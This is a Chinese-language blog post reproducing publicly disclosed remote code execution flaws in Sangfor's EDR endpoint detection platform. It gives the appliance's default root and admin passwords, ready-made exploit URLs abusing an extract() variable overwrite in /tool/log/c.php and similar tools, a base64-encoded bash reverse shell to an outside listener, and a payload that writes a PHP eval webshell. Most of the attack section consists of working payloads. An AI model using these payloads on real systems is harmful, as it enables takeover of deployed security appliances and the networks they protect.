深信服PHP,深信服终端检测响应平台EDR代码审计

今年 HW 深信服的 EDR 爆出了一些很低级的漏洞&＃xff0c;也看到网上不少人再吐槽&＃xff0c;国光也忍不住来分析复现看看。

基本配置信息

网上地下流传的深信服的 EDR ISO 文件实际上是 CentOS7 镜像&＃xff0c;下面国光简单分享记录一下相关信息&＃xff0c;然后面看到的朋友少走弯路。

首先 ISO 安装的话&＃xff0c;不要使用快速安装&＃xff0c;直接挂载即可&＃xff0c;相关的账号密码为&＃xff1a;

用户名

密码

root

edr&＃64;sangfor

安装完成默认是静态 IP&＃xff0c;得配置一下 DHCP IP 即可&＃xff1a;

vim /etc/sysconfig/network-scripts/ifcfg-eth0

主要修改下面部分

BOOTPROTO&＃61;dhcp

然后删掉 IPADDR、GATEWAY 和 NETMASK 等静态 IP 相关的设置&＃xff0c;重启一下网络服务即可&＃xff1a;

service network restart

查看 IP 地址&＃xff0c;浏览器直接访问即可访问到前端登录界面&＃xff1a;

初始默认的用户名和密码都为&＃xff1a;admin

搭建好之后 直接开始复习之前网上爆出来的漏洞信息吧

/tool/log/c.php

首先$show_form 接受用户输入请求&＃xff1a;

跟进这个函数&＃xff0c;发现是经典的extract变量覆盖 &＃xff0c;参数值完全可控……漏洞&＃xff1a;

所以最终可以构造如下 Payload&＃xff1a;

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes&＃61;system&host&＃61;id

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes&＃61;system&path&＃61;id

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes&＃61;system&row&＃61;id

https://xxx.xxx.xx.xx/tool/log/c.php?strip_slashes&＃61;system&limit&＃61;id

这样执行命令不是很方便&＃xff0c;可以选择 bash 反弹 shell 出来&＃xff0c;或者直接上传一个 webshell&＃xff0c;下面简单来尝试一下。

Bash 弹 Shell

首先本地开启 nc 监听端口&＃xff1a;

➜ ~ ncat -lvp 2333

Ncat: Version 7.80 ( https://nmap.org/ncat )

Ncat: Listening on :::2333

Ncat: Listening on 0.0.0.0:2333

然后准备一个反弹 shell 命令&＃xff1a;

bash -i >& /dev/tcp/10.20.24.244/2333 0>&1

Base64 编码为&＃xff1a;

YmFzaCAtaSA&＃43;JiAvZGV2L3RjcC8xMC4yMC4yNC4yNDQvMjMzMyAwPiYx

因为出现了&＃43;号&＃xff0c;浏览器会进行 URL 解码&＃xff0c;&＃43;会变成空格&＃xff0c;所以我们得把 &＃43;首先进行 URL 编码一下&＃xff0c;最后的 payload 就是如下格式&＃xff1a;

https://x.x.x.x/tool/log/c.php?strip_slashes&＃61;system&host&＃61;echo "YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yMC4yNC4yNDQvMjMzMyAwPiYx"|base64 -d|bash

最后执行完即可成功 nc 上线&＃xff0c;然后就可以执行任意命令了&＃xff1a;

直接写入 Webshell

echo &＃39;&＃39; > shell.php

Base64 编码 & &＃43;编码&＃xff1a;

ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOz8%2bJyA%2bIHNoZWxsLnBocA&＃61;&＃61;

最终 payload 如下&＃xff1a;

https://x.x.x.x/tool/log/c.php?strip_slashes&＃61;system&host&＃61;echo "ZWNobyAnPD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOz8%2bJyA%2bIHNoZWxsLnBocA&＃61;&＃61;"|base64 -d|bash

但是有毒的是&＃xff0c;这个 webshell 执行起来并不是那么顺手&＃xff0c;很多命令依然无法执行&＃xff0c;而且 AntSword 也无法连接&＃xff0c;哭了。

/tool/php_cli.php

这个文件的功能默认无法使用&＃xff0c;因为一开始就会判断 enable_dc_tool文件是否存在&＃xff0c;其中 ldb_ext_root()的路径位置为&＃xff1a;

/ac/dc/ldb/

下面是详细的代码&＃xff1a;

但是假设存在这个文件的时候&＃xff0c;下面就会有一个类似于 /tool/log/c.php的中漏洞一样&＃xff0c;也是存在代码执行的&＃xff0c;不过比较鸡肋&＃xff0c;没有利用价值&＃xff1a;

执行效果如下&＃xff1a;

所以最终可以构造如下 Payload&＃xff1a;

https://xxx.xxx.xx.xx/tool/php_cli.php?code&＃61;system(id);

https://xxx.xxx.xx.xx/tool/php_cli.php?strip_slashes&＃61;system&code&＃61;id

/tool/ldb_cli.php

这个文件存在的问题也和上面的 /tool/php_cli.php相似&＃xff0c;如果存在/ac/dc/ldb/php/enable_dc_tool这个文件的时候&＃xff0c;也是可以直接代码执行的&＃xff0c;不过比较鸡肋&＃xff0c;没有利用价值&＃xff1a;

/tool/mdd_sql.php

这个文件存在的问题也和上面的 /tool/php_cli.php相似&＃xff0c;如果存在/ac/dc/ldb/php/enable_dc_tool这个文件的时候&＃xff0c;也是可以直接代码执行的&＃xff0c;不过比较鸡肋&＃xff0c;没有利用价值&＃xff1a;

参考链接